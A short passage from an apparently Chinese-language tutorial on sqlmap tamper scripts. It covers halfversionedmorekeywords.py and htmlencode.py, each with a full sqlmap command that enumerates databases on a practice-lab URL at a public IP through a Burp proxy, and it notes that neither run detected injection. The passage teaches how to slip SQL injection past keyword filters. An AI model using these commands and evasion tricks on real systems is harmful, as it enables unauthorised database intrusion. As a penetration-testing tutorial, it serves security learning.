18. halfversionedmorekeywords.py脚本
在每个关键字之前都加上Mysql注释,用于过滤了关键字的情况,这个适用于Mysql数据库<5.1版本
实战演示:
测试地址:python sqlmap.py -u http://106.54.35.126/Less-1/?id=1 --dbs --tamper="halfversionedmorekeywords.py" --proxy="http://127.0.0.1:8080" -batch
发现并没有识别出来sql注入,目标是高于mysql数据库5.1版本的,所以不行,那我们看看burp的抓包情况,如下:
19. htmlencode.py脚本
针对测试的payload进行html编码,适用于所有数据库,具体看下面的演示
实战演示:
测试地址:python sqlmap.py -u http://106.54.35.126/Less-1/?id=1 --dbs --tamper="htmlencode.py" --proxy="http://127.0.0.1:8080" -batch
同样是测试不出来结果,看看burp的抓包情况:
进行html编码后的结果就是如:)  类似的形式